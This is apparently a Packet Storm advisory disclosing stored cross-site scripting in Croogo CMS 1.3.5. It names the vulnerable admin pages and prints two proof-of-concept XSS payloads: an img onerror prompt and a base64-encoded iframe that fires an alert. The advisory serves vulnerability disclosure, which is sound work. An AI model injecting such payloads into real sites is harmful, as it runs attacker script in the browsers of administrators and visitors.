Croogo 1.3.5 Cross Site Scripting

2013-06-05T00:00:00
ID PACKETSTORM:121910
Type packetstorm
Reporter Nikhalesh Singh Bhadoria
Modified 2013-06-05T00:00:00

Description

                                        
                                            ` Exploit Title: Croogo Cms Multiple Cross Site Scripting Vulnerabilities  
# Date: 06/04/2013  
# Author: Nikhalesh Singh Bhadoria  
# Twitter: @nikhaleshsingh  
# Download Link: http://www.croogo.org/  
# Versions Affected: Croogo 1.3.5  
# Category:Xss  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
Description:  
  
The Vulnerabilities in admin area contacts options and many other place input in is not sanitized. Therefore it results  
in a stored cross-site scripting.  
  
POC:  
http://www.youtube.com/watch?v=gyt4-0ekalc&feature=youtu.be  
  
Code :-  
########################################################################################################  
"><img src=x onerror=prompt(0);>  
  
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">  
  
http://demo.xxx.com/admin/nodes/add/blog  
  
http://demo.xxx.com/admin/vocabularies  
  
http://demo.xxx.com/admin/contacts  
  
##########################################################################################################  
Fix:  
Better sanitization by restricting special characters.  
  
Regard's  
Nikhalesh Singh Bhadoria  
Information Security Enthusiast  
Website:Gurunsb.com  
`